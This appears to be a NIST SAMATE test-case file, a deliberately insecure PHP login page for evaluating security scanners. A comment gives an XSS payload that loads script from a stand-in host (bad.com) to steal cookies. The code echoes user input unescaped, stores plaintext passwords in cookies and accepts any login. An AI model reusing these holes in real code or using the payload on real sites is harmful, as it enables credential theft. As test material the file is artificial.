<?
/* This software was developed at the National Institute of Standards and
 * Technology by employees of the Federal Government in the course of their
 * official duties. Pursuant to title 17 Section 105 of the United States
 * Code this software is not subject to copyright protection and is in the
 * public domain. NIST assumes no responsibility whatsoever for its use by
 * other parties, and makes no guarantees, expressed or implied, about its
 * quality, reliability, or any other characteristic.

 * We would appreciate acknowledgement if the software is used.
 * The SAMATE project website is: http://samate.nist.gov
*/

/*
	Description: XSS attack to stole cookie
	
	Paste in the login: %22<script src=http://www.bad.com/hop.js></script>

*/

	function successful_login($l,$p) { return isset($_GET['login']) && isset($_GET['pass']); }

	if (isset($_GET['login']) && isset($_GET['pass']))
	{
		$login = $_GET['login']; $pass = $_GET['pass'];
		// set the cookie
		setcookie("mySite_login", $login, time()+604800); /* Expires in a week */
		setcookie("mySite_pass" , $pass , time()+604800); /* Expires in a week */
	}
?>
<html>
	<head></head>
<body>

<?
	if (successful_login($login, $pass))
	{
		echo "Hello $login!";
	}
	else
	{
?>
	<form method="get" action="">
		Login: <input type="text" name="login"  value="<? echo $_COOKIE['mySite_login']?>" />
		Pass:  <input type="password" name="pass"value="<? echo $_COOKIE['mySite_pass']?>" />
		<input type="submit" />
	</form>
<?
	}
?>
</body>
</html>